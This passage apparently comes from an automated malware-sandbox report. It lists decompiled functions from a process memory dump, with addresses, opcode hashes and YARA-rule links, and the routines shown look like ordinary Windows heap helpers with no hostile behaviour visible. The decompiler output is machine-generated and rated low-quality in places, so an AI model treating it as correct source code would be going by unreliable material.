                                                                                            • Instruction Fuzzy Hash: A8F0E232A266D48FE772DB28C180B22B7D5FF047B9F0444A4D80587924CB34FC40C680
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA8B58, Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 36%
                                                                                            			E04DA8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dcd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04CF7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                            0x04da8b67
                                                                                            0x04da8b6f
                                                                                            0x04da8b72
                                                                                            0x04da8b7d
                                                                                            0x04da8b8f
                                                                                            0x04da8b7f
                                                                                            0x04da8b88
                                                                                            0x04da8b88
                                                                                            0x04da8b9a
                                                                                            0x04da8b9b
                                                                                            0x04da8b9d
                                                                                            0x04da8ba2
                                                                                            0x04da8bb5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e741852599800866ee4c9ad958b8dbfe4752a57474dc209e60074a320b4493cc
                                                                                            • Instruction ID: 73554195f0cde30ed4093351c51b80558d4deee323aae51ca2d6b2d2da47dc8d
                                                                                            • Opcode Fuzzy Hash: e741852599800866ee4c9ad958b8dbfe4752a57474dc209e60074a320b4493cc
                                                                                            • Instruction Fuzzy Hash: 55F082B0B44259ABEB00EBA8E916E6E73B4FF04304F440499BE05DB391EA38E904D794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0A44B, Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D0A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4dc7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04D1FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                            0x04d0a44b
                                                                                            0x04d0a453
                                                                                            0x04d0a472
                                                                                            0x04d0a476
                                                                                            0x00000000
                                                                                            0x04d0a493
                                                                                            0x04d0a47a
                                                                                            0x04d0a47f
                                                                                            0x04d0a486
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc7f93a011ce9f6eeb5fa6f02f5e9d4a7849b13261fb0bd1b72070be59da8cc8
                                                                                            • Instruction ID: 1bc62d7d256efcc1f2e00c1687a455d46eafba2ab0950f4ac6d072d52687bc2c
                                                                                            • Opcode Fuzzy Hash: dc7f93a011ce9f6eeb5fa6f02f5e9d4a7849b13261fb0bd1b72070be59da8cc8
                                                                                            • Instruction Fuzzy Hash: 5BE09272B41422ABD3115F18FC00F6773AEEBE4655F094039E908C7350D668ED02C7E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDF358, Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 79%
                                                                                            			E04CDF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04D0F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04CF4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                            0x04cdf35d
                                                                                            0x04cdf361
                                                                                            0x04cdf367
                                                                                            0x04cdf372
                                                                                            0x04cdf38c
                                                                                            0x04cdf38c
                                                                                            0x04cdf394

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                            • Instruction ID: de2f3ff720749440f4d0e038f4a8980b2b53003f28f6ae2be2302b1f329bc2b2
                                                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                            • Instruction Fuzzy Hash: A7E06832A00118BBDB3097C89D05F9BBBADEB44B60F010059FA04D7050C460EE00C3D0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CEFF60, Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CEFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4cb11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04DA88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04CF0050(_t14);
				}
			}










                                                                                            0x04ceff66
                                                                                            0x04ceff6b
                                                                                            0x00000000
                                                                                            0x04ceff8f
                                                                                            0x00000000
                                                                                            0x04ceff8f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bda531cf3b7aac7406b6e11a54ece13a57df19f114e9628c4c12cffb1b63bd0f
                                                                                            • Instruction ID: f855377e550e76fd4ed5ebcb03f178f4118162f22df76aa04f07ddd6a673368f
                                                                                            • Opcode Fuzzy Hash: bda531cf3b7aac7406b6e11a54ece13a57df19f114e9628c4c12cffb1b63bd0f
                                                                                            • Instruction Fuzzy Hash: 34E0DFB1205244AFEB34DBA3D150F3537DADF46725F19A01DE4084B102DB21F980D25A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D641E8, Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E04D641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4db08f0);
				_t5 = E04D2D08C(__ebx, __edi, __esi);
				if( *0x4dc87ec == 0) {
					E04CEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4dc87ec == 0) {
						 *0x4dc87f0 = 0x4dc87ec;
						 *0x4dc87ec = 0x4dc87ec;
						 *0x4dc87e8 = 0x4dc87e4;
						 *0x4dc87e4 = 0x4dc87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04D64248();
				}
				return E04D2D0D1(_t5);
			}





                                                                                            0x04d641e8
                                                                                            0x04d641ea
                                                                                            0x04d641ef
                                                                                            0x04d641fb
                                                                                            0x04d64206
                                                                                            0x04d6420b
                                                                                            0x04d64216
                                                                                            0x04d6421d
                                                                                            0x04d64222
                                                                                            0x04d6422c
                                                                                            0x04d64231
                                                                                            0x04d64231
                                                                                            0x04d64236
                                                                                            0x04d6423d
                                                                                            0x04d6423d
                                                                                            0x04d64247

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 825938bc7f16218495031e9298b2c9b27da27665dee37168a1c72676e52da958
                                                                                            • Instruction ID: 60f5979b7788a71de6b99688f60d7ed653dd87894d27c90af3ec37064d8a8686
                                                                                            • Opcode Fuzzy Hash: 825938bc7f16218495031e9298b2c9b27da27665dee37168a1c72676e52da958
                                                                                            • Instruction Fuzzy Hash: 09F01C74A91703CFEB60FF66D614B1436B4F74831AF114119E001873D8E7386944EF15
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D8D380, Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D8D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04CDE8B0(__ecx, _a4, 0xfff);
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                            0x04d8d38a
                                                                                            0x04d8d39b
                                                                                            0x04d8d3b1
                                                                                            0x00000000
                                                                                            0x04d8d3b6
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                            • Instruction ID: 2d198a72bd258a852d826c4f59775476c423ab89b4f8d4cf895556bb584a0340
                                                                                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                            • Instruction Fuzzy Hash: 1FE0C231281644BBEF226E44CC00FB97B17EB407A4F104035FE085A6D0C679FC91E6D4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0A185, Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D0A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4dc67e4 >= 0xa) {
					if(_t5 < 0x4dc6800 || _t5 >= 0x4dc6900) {
						return L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04CF0010(0x4dc67e0, _t5);
				}
			}





                                                                                            0x04d0a190
                                                                                            0x04d0a1a6
                                                                                            0x04d0a1c2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0a192
                                                                                            0x04d0a192
                                                                                            0x04d0a19f
                                                                                            0x04d0a19f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 50c05bacdda78adc5e5423d1309f43c44506dcbafdec7b46f90cf5df24eed46d
                                                                                            • Instruction ID: 2a6afc0b22da819cb72b5686ed779c25ded9ed0354b61e8cd465b0c474f09c67
                                                                                            • Opcode Fuzzy Hash: 50c05bacdda78adc5e5423d1309f43c44506dcbafdec7b46f90cf5df24eed46d
                                                                                            • Instruction Fuzzy Hash: 9BD05B611711015AF71D9710AD54B6522E3EB98718F308C0DF2075BBD1DD64FCD4D149
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D016E0, Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04D01710(0x4dc67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04CF4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                            0x04d016e8
                                                                                            0x04d016ef
                                                                                            0x04d016f3
                                                                                            0x04d016fe
                                                                                            0x00000000
                                                                                            0x04d01700
                                                                                            0x04d0170d
                                                                                            0x04d0170d
                                                                                            0x04d016f2
                                                                                            0x04d016f2
                                                                                            0x04d016f2
                                                                                            0x04d016f2

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 01b259af34a500429b3406f51d668dfac91e81dcfc2294f4bac2f372f83b4005
                                                                                            • Instruction ID: 0f3e2403a3b5ba64814fae735f1cd8689c0d940320587ed3917f3bf5056c5e4e
                                                                                            • Opcode Fuzzy Hash: 01b259af34a500429b3406f51d668dfac91e81dcfc2294f4bac2f372f83b4005
                                                                                            • Instruction Fuzzy Hash: EED0A931240200A6FE2D5B169C08B192262FBC0B89F38006CF20B5B9C0CFA6FDA2E45C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D553CA, Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D553CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04CEEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                            0x04d553ca
                                                                                            0x04d553ce
                                                                                            0x04d553d9
                                                                                            0x04d553de
                                                                                            0x04d553e1
                                                                                            0x04d553e1
                                                                                            0x04d553e6
                                                                                            0x04d553f3
                                                                                            0x00000000
                                                                                            0x04d553f8
                                                                                            0x04d553fb

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                            • Instruction ID: fc61c5ddcd33580bdd23a8dca961575a916ae6c91596b0fafcffdf3a871047ff
                                                                                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                            • Instruction Fuzzy Hash: A1E08C31900780ABDF13DB49CA60F5EB7F6FB44B40F140004A4085B630CA28BC00CB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D035A1, Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D035A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04CEEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                            0x04d035a1
                                                                                            0x04d035a1
                                                                                            0x04d035a5
                                                                                            0x04d035ab
                                                                                            0x04d035ab
                                                                                            0x04d035b5
                                                                                            0x00000000
                                                                                            0x04d035c1
                                                                                            0x04d035b7

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                            • Instruction ID: ae64b61a53d4714252c4fdabdf8e847fd2f6326569660f8d6bfe1c3f2d853c93
                                                                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                            • Instruction Fuzzy Hash: 2DD0A931A016809AEB01AB10C22C76833B2FB00308F58A0658842078F2C33AEA0AE600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CEAAB0, Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CEAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                            0x04ceaab6
                                                                                            0x04ceaabb
                                                                                            0x04d3a442
                                                                                            0x00000000
                                                                                            0x04d3a448
                                                                                            0x04d3a454
                                                                                            0x04d3a454
                                                                                            0x04ceaac1
                                                                                            0x04ceaac1
                                                                                            0x04ceaac6
                                                                                            0x04ceaac6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                            • Instruction ID: 853bff314ff781a3d7d7550d87c170ddd741e16e7158beee010ada04cc75930b
                                                                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                            • Instruction Fuzzy Hash: B3D0E935352A80DFD716CF1DC554B1573A5BB44B45FC504A0E545CBB61E72DE954CA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D5A537, Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D5A537(intOrPtr _a4, intOrPtr _a8) {

				return L04CF8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                            0x04d5a553

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                            • Instruction ID: a55524c8ad72cd51cfea8cf39cef820417754961dea64e03eb26742430c71cca
                                                                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                            • Instruction Fuzzy Hash: 29C01236080648BBCB126E81CC00F067B2AEB94B60F018010BA080A5608636E970EA94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDDB40, Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CDDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04CF4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                            0x04cddb4d
                                                                                            0x04cddb54
                                                                                            0x04cddb5f
                                                                                            0x04cddb56
                                                                                            0x04cddb56
                                                                                            0x04cddb5c
                                                                                            0x04cddb5c

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                            • Instruction ID: de4370ccc584387a3e08ddb481b3ad023da1b80ed4bacab55d7ffedecb67fffd
                                                                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                            • Instruction Fuzzy Hash: 12C08C30290A40ABEB661F20CD01B4136A2BB10B09F4400A06301DA0F0DB7CEA01EA00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDAD30, Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CDAD30(intOrPtr _a4) {

				return L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                            0x04cdad49

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                            • Instruction ID: 0be8e4b5053398ddd856554f63af04924929df01dcc3dcc1f5a2ab81e9a6e648
                                                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                            • Instruction Fuzzy Hash: D2C08C32080648BBC7126B45CD00F017B2AE790B60F000021B6040A661C936F860E588
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D036CC, Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04D036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04CF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                            0x04d036d2
                                                                                            0x04d036e8
                                                                                            0x04d036d4
                                                                                            0x04d036e5
                                                                                            0x04d036e5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                            • Instruction ID: 0e3e09c9535311b2ee7857a2882e2e55c6f9f0b445b367c790a1d549a93c6289
                                                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                            • Instruction Fuzzy Hash: D7C02B70150440FBEB191F30CD00F157254F710B21FA4035473204A4F0D52CBC00E604
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE76E2, Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CE76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                            0x04ce76e4
                                                                                            0x00000000
                                                                                            0x04ce76f8
                                                                                            0x04ce76fd

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                            • Instruction ID: 9d56042cc3be3e42721f1d6e7d9a93cc1df3923a97faab7b0828cab1cd0c1021
                                                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                            • Instruction Fuzzy Hash: 29C08C701635809AEB2E6F09CE22B30365AAB0870CF48019CAA01094A1C36CB902C208
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CF3A1C, Relevance: .0, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CF3A1C(intOrPtr _a4) {
				void* _t5;

				return L04CF4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                            0x04cf3a35

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
